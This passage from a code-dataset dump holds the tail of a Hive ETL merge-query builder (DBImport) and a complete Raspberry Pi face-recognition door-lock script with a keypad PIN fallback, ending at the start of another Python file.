\n\t\t\t\tquery += \" T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\t\telse:\n\t\t\t\tquery += \"and\\n T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\tquery += \"\\n\"\n\t\n\t\tquery += \"when matched \"\n\t\tif sourceIsIncremental == False:\n\t\t\t# If the source is not incremental, it means that we need to check all the values in \n\t\t\t# all columns as we dont know if the row have changed or not\n\t\t\tquery += \"and (\\n\"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tfoundPKcolumn = False\n\t\t\t\tfor column in PKColumns.split(\",\"):\n\t\t\t\t\tif row['targetName'] == column:\n\t\t\t\t\t\tfoundPKcolumn = True\n\t\t\t\tif foundPKcolumn == False:\n\t\t\t\t\tif firstIteration == True:\n\t\t\t\t\t\tquery += \" \"\n\t\t\t\t\t\tfirstIteration = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tquery += \" or \"\n\t\t\t\t\tquery += \"T.`%s` != S.`%s` \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"or ( T.`%s` is null and S.`%s` is not null ) \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"or ( T.`%s` is not null and S.`%s` is null ) \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"\\n\"\n\n\t\t\tif softDelete == True and datalakeIUDExists == True:\n\t\t\t\t# If a row is deleted and then inserted again with the same values in all fields, this will still trigger an update\n\t\t\t\tquery += \" or T.datalake_iud = 'D' \\n\"\n\n\t\t\tquery += \") \\n\"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"and ( S.datalake_flashback_operation is null or S.datalake_flashback_operation != 'D' ) \\n\"\n\n\t\tif mssqlChangeTrackingSource == True:\n\t\t\tquery += \"and ( S.datalake_mssql_changetrack_operation is null or S.datalake_mssql_changetrack_operation != 'D' ) \\n\"\n\n\t\tquery += \"then update set \"\n\t\tfirstIteration = True\n\t\tnonPKcolumnFound = False\n\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\tfoundPKcolumn = False\n\t\t\tfor column in PKColumns.split(\",\"):\n\t\t\t\tif row['targetName'] == column:\n\t\t\t\t\tfoundPKcolumn = True\n\t\t\tif foundPKcolumn == False:\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s` = S.`%s`\"%(row['targetName'], row['sourceName'])\n\t\t\t\tnonPKcolumnFound = True\n\n\t\tif nonPKcolumnFound == False:\n\t\t\t# This will happen if there are only columns that is part of the PK in the table. Impossible to merge it with full history\n\t\t\tlogging.error(\"This table only have columns that is part of the PrimaryKey. Merge operations cant be used\")\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\t\tif datalakeIUDExists == True: \n\t\t\tquery += \", \\n `datalake_iud` = 'U'\"\n\n\t\tif datalakeUpdateExists == True:\n\t\t\tquery += \", \\n `datalake_update` = TIMESTAMP('%s')\"%(mergeTime)\n\n\t\tif datalakeSourceExists == True and datalakeSource != None: \n\t\t\tquery += \", \\n `datalake_source` = '%s'\"%(datalakeSource)\n\n\t\tquery += \" \\n\"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"when matched and S.datalake_flashback_operation = 'D' then delete \\n\"\n\n\t\t# We should only delete rows during merge if we dont need to create the History table. Otherwise we will miss the values in all columns except PK columns\n\t\tif mssqlChangeTrackingSource == True and createHistoryAudit == False:\n\t\t\tquery += \"when matched and S.datalake_mssql_changetrack_operation = 'D' then delete \\n\"\n\n\t\tquery += \"when not matched \"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"and ( S.datalake_flashback_operation is null or S.datalake_flashback_operation != 'D' ) \\n\"\n\n\t\tif mssqlChangeTrackingSource == True:\n\t\t\tquery += \"and ( S.datalake_mssql_changetrack_operation is null or S.datalake_mssql_changetrack_operation != 'D' ) \\n\"\n\n\t\tquery += \"then insert ( \"\n\t\tfirstIteration = True\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tColumnName = row['name']\n\t\t\tif firstIteration == True:\n\t\t\t\tfirstIteration = False\n\t\t\t\tquery += \" \\n\"\n\t\t\telse:\n\t\t\t\tquery += \", \\n\"\n\t\t\tquery += \" `%s`\"%(ColumnName)\n\t\tquery += \" \\n) values (\"\n\n\t\tfirstIteration = True\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tColumnName = row['name']\n\t\t\tsourceColumnName = columnMerge.loc[columnMerge['targetName'] == ColumnName]['sourceName'].fillna('').iloc[0]\n\t\t\tif firstIteration == True:\n\t\t\t\tfirstIteration = False\n\t\t\t\tquery += \" \\n\"\n\t\t\telse:\n\t\t\t\tquery += \", \\n\"\n\t\t\tif sourceColumnName != \"\":\n\t\t\t\tquery += \" S.`%s`\"%(sourceColumnName)\n\t\t\telif ColumnName == \"datalake_iud\": \n\t\t\t\tquery += \" 'I'\"\n\t\t\telif ColumnName == \"datalake_insert\": \n\t\t\t\tquery += \" TIMESTAMP('%s')\"%(mergeTime)\n\t\t\telif ColumnName == \"datalake_update\": \n\t\t\t\tquery += \" TIMESTAMP('%s')\"%(mergeTime)\n\t\t\telif ColumnName == \"datalake_source\": \n\t\t\t\tquery += \" '%s'\"%(datalakeSource)\n\t\t\telse:\n\t\t\t\tquery += \" NULL\"\n\n\t\tquery += \" \\n) \\n\"\n\n\t\tif printSQLQuery == True:\n\t\t\tprint(\"==============================================================\")\n\t\t\tprint(query)\n\n\t\tself.executeSQLQuery(query)\n\n\t\t# If a row was previously deleted and now inserted again and we are using Soft Delete, \n\t\t# then the information in the datalake_iud, datalake_insert and datalake_delete is wrong. \n\t\tif softDelete == True:\n\t\t\tquery = \"update %s set \"%(targetDBandTable)\n\t\t\tquery += \" datalake_iud = 'I', \"\n\t\t\tquery += \" datalake_insert = datalake_update, \"\n\t\t\tquery += \" datalake_delete = null \"\n\t\t\tquery += \"where \" \n\t\t\tquery += \" datalake_iud = 'U' and \"\n\t\t\tquery += \" datalake_delete is not null \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\t# Statement to select all rows that was changed in the Target table and insert them to the History table\n\t\tif (createHistoryAudit == True and historyDB != None and historyTable != None and oracleFlashbackSource == False and mssqlChangeTrackingSource == False) or \\\n\t\t\t(createHistoryAudit == True and historyDB != None and historyTable != None and mssqlChangeTrackingSource == True and sourceIsIncremental == False):\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_update`\"\n\t\t\tquery += \"\\nfrom %s \\n\"%(targetDBandTable)\n\t\t\tquery += \"where datalake_update = TIMESTAMP('%s') \\n\"%(mergeTime)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif sourceIsIncremental == False and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\t# Start with truncating the History Delete table as we need to rebuild this one from scratch to determine what rows are deleted\n\t\t\tquery = \"truncate table %s\"%(targetDeleteDBandTable)\n\t\t\tself.executeSQLQuery(query)\n\n\t\t\t# Insert all rows (PK columns only) that exists in the Target Table but dont exists in the Import table (the ones that was deleted)\n\t\t\tquery = \"insert into table %s \\n(`\"%(targetDeleteDBandTable)\n\t\t\tquery += \"`, `\".join(PKColumns.split(\",\"))\n\t\t\tquery += \"`) \\nselect T.`\"\n\t\t\tquery += \"`, T.`\".join(PKColumns.split(\",\"))\n\t\t\tquery += \"` \\nfrom %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"left outer join %s as S \\n\"%(sourceDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\n\t\t\tquery += \"\\nwhere \\n\"\n\n\t\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" S.`%s` is null \"%(sourceColumn)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n S.`%s` is null \"%(sourceColumn)\n\t\t\tquery += \"\\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif oracleFlashbackSource == True and createHistoryAudit == True:\n\t\t\t# If it is a history merge with Oracle Flashback, we need to handle the deletes separatly\t\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_flashback_operation` as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s \\n\"%(oracleFlashbackImportDBandTable)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif mssqlChangeTrackingSource == True and createHistoryAudit == True and sourceIsIncremental == True:\n\t\t\t# We only run this of it's an incremental load, i.e CDT is working. Full load, falling over the edge and such should not load from import table but instead from target table\n\t\t\t# and that is handled above with the same code as full import with history is using\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_mssql_changetrack_operation` as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s \"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"\\nwhere datalake_mssql_changetrack_operation != 'D' \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\n\t\t\t# This query inserts the deleted rows, including all columns into the History table. \n\t\t\t# Without it, the column not part of the PK would not be available in History table\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" T.`%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s' as `datalake_source`\"%(datalakeSource)\n\t\t\tquery += \",\\n 'D' as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s as D \\n\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"inner join %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tquery += \"\\nwhere D.datalake_mssql_changetrack_operation == 'D' \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\t\t# The last step is to delete the rows in the Target table based on what rows have D in the import table\n\t\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"using %s as D \\n\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tquery += \"\\n\"\n\t\t\tquery += \"and D.datalake_mssql_changetrack_operation == 'D' \\n\"\n\t\t\tquery += \"when matched then delete \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\n\t\t# Insert the deleted rows into the History table. Without this, it's impossible to see what values the column had before the delete\n\t\tif sourceIsIncremental == False and createHistoryAudit == True and historyDB != None and historyTable != None and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" T.`%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s' as `datalake_source`\"%(datalakeSource)\n\t\t\tquery += \",\\n 'D' as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s as D \\n\"%(targetDeleteDBandTable)\n\t\t\tquery += \"left join %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif sourceIsIncremental == False and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\t# Use the merge command to delete found rows between the Delete Table and the History Table\n\t\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"using %s as D \\n\"%(targetDeleteDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tif softDelete == True:\n\t\t\t\tquery += \"and\\n T.`datalake_delete` != 'D' \"\n\t\t\tquery += \"\\n\"\n\n\t\t\tif softDelete == False:\n\t\t\t\tquery += \"when matched then delete \\n\"\n\t\t\telse:\n\t\t\t\tquery += \"when matched then update set \\n\" \n\t\t\t\tquery += \"datalake_iud = 'D', \\n\" \n\t\t\t\tquery += \"datalake_update = timestamp('%s'), \\n\"%(mergeTime)\n\t\t\t\tquery += \"datalake_delete = timestamp('%s') \"%(mergeTime)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tlogging.debug(\"Executing etl_operations.mergeHiveTables() - Finished\")\n\n","repo_name":"Middlecon/DBImport","sub_path":"bin/DBImportOperation/etl_operations.py","file_name":"etl_operations.py","file_ext":"py","file_size_in_byte":23452,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"20043549663","text":"import cv2\nimport numpy as np\nimport os \nimport RPi.GPIO as GPIO\nimport time\nfrom gpiozero import Servo, Buzzer, LED\nfrom signal import signal, SIGTERM, SIGHUP, pause\nfrom rpi_lcd import LCD\n\n\n# Set timer for face detection\ntimeout = time.time() + 60*0.33\n\nlcd = LCD()\n\nredLED = LED(27)\ngreenLED = LED(26)\n\nbuzzer = Buzzer(23)\n\n# Servo pin output at GPIO25\nservo = Servo(25)\n\nservo.mid()\n\ncnt = 0\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read('trainer/trainer.yml')\ncascadePath = \"haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascadePath);\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n#iniciate id counter\nid = 0\n\n# Setting names with their respective User ID\n# 0 1 2 3 4\nnames = ['None', 'Dhruval', 'Sahithi', 'Z', 'W'] \n\n# Initialize and start realtime video capture\ncam = cv2.VideoCapture(0)\ncam.set(3, 640) # set video widht\ncam.set(4, 480) # set video height\n\n# Define minimum window size to be recognized as a face\nminW = 0.1*cam.get(3)\nminH = 0.1*cam.get(4)\n\nlcd.clear()\nlcd.text(\"Bring your face\",1)\nlcd.text(\"near the camera\",2)\n\n# These are the GPIO pin numbers where the\n# lines of the keypad matrix are connected\nL1 = 5\nL2 = 6\nL3 = 13\nL4 = 19\n\n# These are the four columns\nC1 = 12\nC2 = 16\nC3 = 20\nC4 = 21\n\n# The GPIO pin of the column of the key that is currently\n# being held down or -1 if no key is pressed\nkeypadPressed = -1\n\n# Initializing passcode for entry\nsecretCode = \"1999\"\ninput = \"\"\n\n# Setup GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(L1, GPIO.OUT)\nGPIO.setup(L2, GPIO.OUT)\nGPIO.setup(L3, GPIO.OUT)\nGPIO.setup(L4, GPIO.OUT)\n\n# Use the internal pull-down resistors\nGPIO.setup(C1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C3, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C4, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# This callback registers the key that was pressed\n# if no other key is currently pressed\ndef keypadCallback(channel):\n global keypadPressed\n if keypadPressed == -1:\n keypadPressed = channel\n\n# Detect the rising edges on the column lines of the\n# keypad. This way, we can detect if the user presses\n# a button when we send a pulse.\nGPIO.add_event_detect(C1, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C2, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C3, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C4, GPIO.RISING, callback=keypadCallback)\n\n# Sets all lines to a specific state. This is a helper\n# for detecting when the user releases a button\ndef setAllLines(state):\n GPIO.output(L1, state)\n GPIO.output(L2, state)\n GPIO.output(L3, state)\n GPIO.output(L4, state)\n\ndef checkSpecialKeys():\n global input\n global cnt\n pressed = False\n\n GPIO.output(L3, GPIO.HIGH)\n\n if (GPIO.input(C4) == 1):\n print(\"\\nInput reset!\")\n lcd.clear()\n lcd.text(\"Input reset!\",1)\n lcd.text(\"Enter pin again!\",2)\n pressed = True\n\n GPIO.output(L3, GPIO.LOW)\n GPIO.output(L1, GPIO.HIGH)\n \n if (not pressed and GPIO.input(C4) == 1):\n \n cnt += 1\n \n # checking if the entered pin is the passcode\n if input == secretCode:\n print(\"\\nPin correct!\")\n servo.max()\n print(\"\\nDoor unlocked\")\n lcd.clear()\n lcd.text(\"Door unlocked...\",1)\n lcd.text(\" Welcome!\",2)\n buzzer.on()\n greenLED.on()\n time.sleep(1)\n buzzer.off()\n time.sleep(10)\n greenLED.off()\n servo.mid()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \n else:\n print(\"\\nIncorrect pin! Please try again...\")\n lcd.clear()\n lcd.text(\"Incorrect pin!\",1)\n lcd.text(\"Please try again\",2)\n # giving three attempts to enter the correct pin\n # or else display the message for intruders\n if cnt > 2 :\n print(\"\\nINTRUDER ALERT!!!\")\n print(\"\\nMaximum attempts reached\")\n lcd.clear()\n lcd.text(\"Maximum attempts\",1)\n lcd.text(\"INTRUDER ALERT!!!\",2)\n buzzer.beep()\n redLED.on()\n time.sleep(10)\n redLED.off()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \n pressed = True\n GPIO.output(L3, GPIO.LOW)\n\n if pressed:\n input = \"\"\n\n return pressed\n \n\n# reads the columns and appends the value, that corresponds\n# to the button, to a variable\ndef readLine(line, characters):\n global input\n # We have to send a pulse on each line to\n # detect button presses\n GPIO.output(line, GPIO.HIGH)\n if(GPIO.input(C1) == 1):\n input = input + characters[0]\n if(GPIO.input(C2) == 1):\n input = input + characters[1]\n if(GPIO.input(C3) == 1):\n input = input + characters[2]\n if(GPIO.input(C4) == 1):\n input = input + characters[3]\n GPIO.output(line, GPIO.LOW)\n \n# Function to do tasks after face detection \ndef faceDetected() :\n cv2.destroyAllWindows()\n print(\"\\nDoor unlocked\")\n lcd.clear()\n lcd.text(\"Face detected!\",1)\n buzzer.on()\n time.sleep(1)\n buzzer.off()\n time.sleep(2)\n servo.max()\n greenLED.on()\n lcd.clear()\n lcd.text(\"Door unlocked...\",1)\n lcd.text(\" Welcome!\",2)\n time.sleep(10)\n greenLED.off()\n servo.mid()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \ndef safe_exit(signum, frame):\n exit(1)\n\nsignal(SIGTERM, safe_exit)\nsignal(SIGHUP, safe_exit)\n \n \ntry :\n while True:\n \n test = 0\n\n ret, img =cam.read()\n img = cv2.flip(img, -1) # Flip vertically\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less than 100 ==> \"0\" is perfect match \n if (confidence < 100):\n id = names[id]\n confidence = \" {0}%\".format(round(100 - confidence))\n faceDetected()\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(round(100 - confidence))\n \n cv2.putText(img, str(id), (x+5,y-5), font, 1, (255,255,255), 2)\n cv2.putText(img, str(confidence), (x+5,y+h-5), font, 1, (255,255,0), 1) \n \n cv2.imshow('Face detection camera',img) \n\n k = cv2.waitKey(10) & 0xff # Press 'ESC' for exiting video\n if k == 27 or test == 0.33 or time.time() > timeout:\n break\n test = test - 1\n \n# keypad passcode entry after face not detected \n cv2.destroyAllWindows()\n cam.release()\n lcd.clear()\n lcd.text(\"Face undetected!\",1)\n buzzer.on()\n time.sleep(1)\n buzzer.off()\n redLED.on()\n time.sleep(5)\n redLED.off()\n print(\"\\nEnter password:\")\n lcd.clear()\n lcd.text(\"Enter password\",1)\n lcd.text(\"on the keypad\",2)\n \n while True :\n # If a button was previously pressed,\n # check, whether the user has released it yet\n if keypadPressed != -1:\n setAllLines(GPIO.HIGH)\n if GPIO.input(keypadPressed) == 0:\n keypadPressed = -1\n else:\n time.sleep(0.1)\n # Otherwise, just read the input\n else:\n if not checkSpecialKeys():\n readLine(L1, [\"1\",\"2\",\"3\",\"A\"])\n readLine(L2, [\"4\",\"5\",\"6\",\"B\"])\n readLine(L3, [\"7\",\"8\",\"9\",\"C\"])\n readLine(L4, [\"*\",\"0\",\"#\",\"D\"])\n time.sleep(0.1)\n else:\n time.sleep(0.1)\n\n# Do a bit of cleanup\nexcept KeyboardInterrupt:\n print(\"\\n[INFO] Exiting program\")\n lcd.clear()\n lcd.text(\" Goodbye!\",1)\n time.sleep(5)\n cam.release()\n cv2.destroyAllWindows()\n \nfinally:\n lcd.clear()","repo_name":"DhruvalShah199/Facial-Recognition-Door-Lock","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41914519416","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nfrom matplotlib import pyplot as plt\nfrom pylab import figure, show, plt\nimport xlrd\n\ndebug = 